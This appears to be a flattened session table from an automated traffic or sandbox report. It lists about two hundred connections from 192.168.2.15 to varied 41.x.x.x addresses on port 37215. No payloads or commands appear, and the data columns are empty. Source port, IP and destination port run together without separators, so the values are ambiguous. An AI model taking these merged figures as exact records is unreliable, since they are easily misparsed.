                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24185192.168.2.155934041.89.149.8537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24186192.168.2.154755841.104.252.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24187192.168.2.155235641.70.161.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24188192.168.2.156017241.71.22.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24189192.168.2.154402641.239.108.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24190192.168.2.155724441.29.215.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24191192.168.2.155155641.118.131.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24192192.168.2.155454841.80.254.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24193192.168.2.154860441.110.32.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24194192.168.2.155934841.0.56.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24195192.168.2.155166041.156.198.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24196192.168.2.153397841.86.81.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24197192.168.2.155786241.142.207.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24198192.168.2.153935241.155.206.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24199192.168.2.154359841.4.20.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24200192.168.2.155314441.82.144.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24201192.168.2.154363241.110.17.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24202192.168.2.154669841.34.159.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24203192.168.2.155669041.255.107.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24204192.168.2.153907241.67.36.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24205192.168.2.154142841.130.48.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24206192.168.2.155034041.217.30.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24207192.168.2.154889041.221.130.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24208192.168.2.155083041.74.249.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24209192.168.2.153466641.15.246.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24210192.168.2.153593641.7.55.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24211192.168.2.154725441.115.99.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24212192.168.2.153732441.68.15.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24213192.168.2.153447041.34.152.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24214192.168.2.153367641.161.165.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24215192.168.2.154554241.80.254.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24216192.168.2.154080841.5.12.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24217192.168.2.153400641.118.156.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24218192.168.2.153289641.1.109.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24219192.168.2.154541841.172.13.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24220192.168.2.153884441.168.185.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24221192.168.2.155052241.86.137.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24222192.168.2.154283841.32.201.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24223192.168.2.153552841.11.15.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24224192.168.2.154455041.226.208.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24225192.168.2.153791441.207.250.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24226192.168.2.153786441.60.134.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24227192.168.2.156045041.230.56.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24228192.168.2.154155041.254.252.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24229192.168.2.155474041.217.209.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24230192.168.2.155277641.94.169.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24231192.168.2.153661441.111.218.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24232192.168.2.154617041.41.239.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24233192.168.2.155357041.132.197.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24234192.168.2.154708241.164.68.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24235192.168.2.154333441.221.141.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24236192.168.2.154052041.32.139.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24237192.168.2.155445241.88.202.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24238192.168.2.153937441.171.69.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24239192.168.2.154958641.245.251.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24240192.168.2.155525641.175.108.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24241192.168.2.153834041.222.134.5337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24242192.168.2.155597241.142.85.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24243192.168.2.155225041.24.228.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24244192.168.2.153650241.48.145.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24245192.168.2.155032841.181.189.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24246192.168.2.155512841.231.135.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24247192.168.2.154980441.117.155.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24248192.168.2.155524041.192.36.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24249192.168.2.155883241.21.11.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24250192.168.2.155652441.255.3.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24251192.168.2.155174041.57.124.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24252192.168.2.154153041.221.30.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24253192.168.2.154819441.192.131.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24254192.168.2.155553841.222.36.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24255192.168.2.154502441.175.220.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24256192.168.2.155514641.159.241.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24257192.168.2.154030641.185.206.20337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24258192.168.2.154320441.112.206.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24259192.168.2.156013041.191.230.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24260192.168.2.154171041.29.244.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24261192.168.2.154082041.176.112.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24262192.168.2.154196641.83.135.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24263192.168.2.155048641.137.118.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24264192.168.2.154215641.66.213.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24265192.168.2.154437841.239.72.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24266192.168.2.153905841.55.36.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24267192.168.2.154211841.184.3.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24268192.168.2.153906441.122.36.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24269192.168.2.154743441.254.231.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24270192.168.2.154787641.37.224.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24271192.168.2.153953641.171.102.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24272192.168.2.153310041.209.179.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24273192.168.2.156013441.212.101.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24274192.168.2.155517041.175.72.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24275192.168.2.155202641.174.131.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24276192.168.2.155387641.174.19.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24277192.168.2.154043841.47.0.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24278192.168.2.155153841.252.97.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24279192.168.2.153842041.206.211.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24280192.168.2.155112241.34.251.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24281192.168.2.155746641.6.228.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24282192.168.2.155651241.179.254.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24283192.168.2.153471041.156.9.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24284192.168.2.155516641.79.38.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24285192.168.2.155600441.7.30.7637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24286192.168.2.154364241.126.61.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24287192.168.2.155012641.22.117.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24288192.168.2.153547441.13.185.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24289192.168.2.155349841.99.47.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24290192.168.2.154134841.247.249.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24291192.168.2.153345441.186.172.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24292192.168.2.154698641.101.90.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24293192.168.2.155211241.155.80.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24294192.168.2.154071441.253.96.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24295192.168.2.153608041.31.101.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24296192.168.2.154140441.85.7.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24297192.168.2.155894841.138.35.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24298192.168.2.154615441.18.215.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24299192.168.2.154102641.76.222.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24300192.168.2.153793041.97.168.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24301192.168.2.154153841.130.161.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24302192.168.2.155057441.109.35.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24303192.168.2.153825241.237.125.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24304192.168.2.153817841.118.207.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24305192.168.2.153424241.104.198.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24306192.168.2.154253641.89.129.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24307192.168.2.153444041.101.194.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24308192.168.2.156035441.183.16.21237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24309192.168.2.156016441.33.110.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24310192.168.2.154153241.172.151.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24311192.168.2.155754441.89.244.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24312192.168.2.155865241.220.132.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24313192.168.2.154895041.108.58.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24314192.168.2.154296241.68.136.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24315192.168.2.155308841.94.247.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24316192.168.2.154927241.194.78.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24317192.168.2.155500041.58.92.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24318192.168.2.154144241.32.81.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24319192.168.2.153752841.84.133.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24320192.168.2.155504441.48.71.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24321192.168.2.153327641.162.58.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24322192.168.2.156083841.137.171.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24323192.168.2.155031241.95.96.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24324192.168.2.154287641.75.6.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24325192.168.2.155524241.77.109.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24326192.168.2.155430841.200.162.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24327192.168.2.154424841.114.18.6537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24328192.168.2.155852041.86.220.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24329192.168.2.156095841.210.0.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24330192.168.2.154451241.8.163.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24331192.168.2.155671441.158.87.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24332192.168.2.156048041.196.45.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24333192.168.2.154187241.53.212.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24334192.168.2.154794441.175.166.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24335192.168.2.153734641.16.237.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24336192.168.2.155657041.98.32.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24337192.168.2.154163641.171.101.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24338192.168.2.153538841.31.57.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24339192.168.2.155097841.254.14.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24340192.168.2.154520641.253.192.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24341192.168.2.155187641.224.21.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24342192.168.2.154725241.75.201.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24343192.168.2.155458241.56.86.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24344192.168.2.155844641.183.92.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24345192.168.2.154602241.158.244.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24346192.168.2.155895441.130.214.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24347192.168.2.155325041.174.153.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24348192.168.2.154724841.243.148.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24349192.168.2.153935841.98.61.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24350192.168.2.154163841.195.37.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24351192.168.2.154917641.197.67.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24352192.168.2.153734641.64.108.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24353192.168.2.154213041.2.204.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24354192.168.2.153492441.6.255.11537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24355192.168.2.156009241.44.52.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24356192.168.2.154840441.45.66.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24357192.168.2.155823041.111.35.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24358192.168.2.154374241.82.158.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24359192.168.2.153484241.79.56.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24360192.168.2.153925641.48.142.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24361192.168.2.154148441.22.243.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24362192.168.2.153836041.147.244.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24363192.168.2.154578041.38.19.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24364192.168.2.153443241.220.85.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24365192.168.2.153727241.123.126.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24366192.168.2.153752441.126.102.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24367192.168.2.156017841.205.25.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24368192.168.2.156058641.9.176.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24369192.168.2.155321441.181.40.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24370192.168.2.155339641.240.96.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24371192.168.2.154935441.251.226.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24372192.168.2.154862041.74.26.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24373192.168.2.153375241.106.127.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24374192.168.2.153475041.66.22.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24375192.168.2.155377641.207.94.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24376192.168.2.154289241.128.102.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24377192.168.2.155874641.245.149.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24378192.168.2.154198841.6.199.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24379192.168.2.156058441.239.95.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24380192.168.2.155582441.203.55.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24381192.168.2.154028641.138.192.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24382192.168.2.154494641.243.9.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24383192.168.2.155962841.75.64.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24384192.168.2.154660441.212.124.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24385192.168.2.155863041.86.62.10437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            24386192.168.2.155144641.238.112.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
